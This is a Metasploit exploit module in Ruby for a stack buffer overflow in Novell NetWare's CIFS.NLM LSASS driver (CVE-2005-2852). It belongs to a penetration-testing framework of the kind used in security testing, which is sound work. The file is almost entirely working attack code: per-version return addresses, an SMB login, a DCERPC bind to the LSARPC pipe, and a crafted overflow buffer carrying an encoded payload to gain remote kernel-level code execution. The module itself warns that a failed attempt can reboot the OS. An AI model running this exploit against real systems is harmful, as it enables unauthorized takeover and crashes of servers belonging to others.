1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::DCERPC
10
  include Msf::Exploit::Remote::SMB::Client
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow',
17
        'Description' => %q{
18
          This module exploits a stack buffer overflow in the NetWare CIFS.NLM driver.
19
          Since the driver runs in the kernel space, a failed exploit attempt can
20
          cause the OS to reboot.
21
        },
22
        'Author' => [
23
          'toto',
24
        ],
25
        'License' => MSF_LICENSE,
26
        'References' => [
27
          [ 'CVE', '2005-2852' ],
28
          [ 'OSVDB', '12790' ]
29
        ],
30
        'Privileged' => true,
31
        'Payload' => {
32
          'Space' => 400,
33
          'BadChars' => "\x00"
34
        },
35
        'Platform' => 'netware',
36
        'Targets' => [
37
          # NetWare SP can be found in the SNMP version :
38
          # 5.70.07 -> NetWare 6.5 (5.70) SP7 (07)
39

40
          [ 'VMware', { 'Ret' => 0x000f142b } ],
41
          [ 'NetWare 6.5 SP2', { 'Ret' => 0xb2329b98 } ], # push esp - ret (libc.nlm)
42
          [ 'NetWare 6.5 SP3', { 'Ret' => 0xb234a268 } ], # push esp - ret (libc.nlm)
43
          [ 'NetWare 6.5 SP4', { 'Ret' => 0xbabc286c } ], # push esp - ret (libc.nlm)
44
          [ 'NetWare 6.5 SP5', { 'Ret' => 0xbabc9c3c } ], # push esp - ret (libc.nlm)
45
          [ 'NetWare 6.5 SP6', { 'Ret' => 0x823c835c } ], # push esp - ret (libc.nlm)
46
          [ 'NetWare 6.5 SP7', { 'Ret' => 0x823c83fc } ], # push esp - ret (libc.nlm)
47
        ],
48
        'Notes' => {
49
          'Stability' => [ CRASH_OS_RESTARTS ],
50
          'SideEffects' => [ IOC_IN_LOGS ],
51
          'Reliability' => [ UNRELIABLE_SESSION ]
52
        },
53
        'DisclosureDate' => '2007-01-21'
54
      )
55
    )
56

57
    register_options(
58
      [
59
        OptString.new('SMBPIPE', [true, 'The pipe name to use (LSARPC)', 'lsarpc'])
60
      ]
61
    )
62

63
    deregister_options('DCERPC::fake_bind_multi')
64
  end
65

66
  def exploit
67
    # Force multi-bind off (netware doesn't support it)
68
    datastore['DCERPC::fake_bind_multi'] = false
69

70
    connect
71
    smb_login
72

73
    handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
74

75
    print_status("Binding to #{handle} ...")
76
    dcerpc_bind(handle)
77
    print_status("Bound to #{handle} ...")
78

79
    stb =
80
      NDR.long(rand(0xffffffff)) +
81
      NDR.UnicodeConformantVaryingString("\\\\#{datastore['RHOST']}") +
82
      NDR.long(0) +
83
      NDR.long(0) +
84
      NDR.long(0) +
85
      NDR.long(0) +
86
      NDR.long(0) +
87
      NDR.long(0) +
88
      NDR.long(0x000f0fff)
89

90
    resp = dcerpc.call(0x2c, stb)
91
    handle, = resp[0, 20]
92
    _code = resp[20, 4].unpack('V')
93

94
    name =
95
      rand_text_alphanumeric(0xa0) +
96
      [target.ret].pack('V') +
97
      payload.encoded
98

99
    stb =
100
      handle +
101
      NDR.long(1) +
102
      NDR.long(1) +
103
      NDR.short(name.length) +
104
      NDR.short(name.length) +
105
      NDR.long(rand(0xffffffff)) +
106
      NDR.UnicodeConformantVaryingStringPreBuilt(name) +
107
      NDR.long(0) +
108
      NDR.long(0) +
109
      NDR.long(1) +
110
      NDR.long(0)
111

112
    print_status('Calling the vulnerable function ...')
113

114
    begin
115
      dcerpc.call(0x0E, stb)
116
    rescue StandardError
117
      # DCERPC call may fail, this is expected
118
    end
119

120
    handler
121
    disconnect
122
  end
123
end
124

125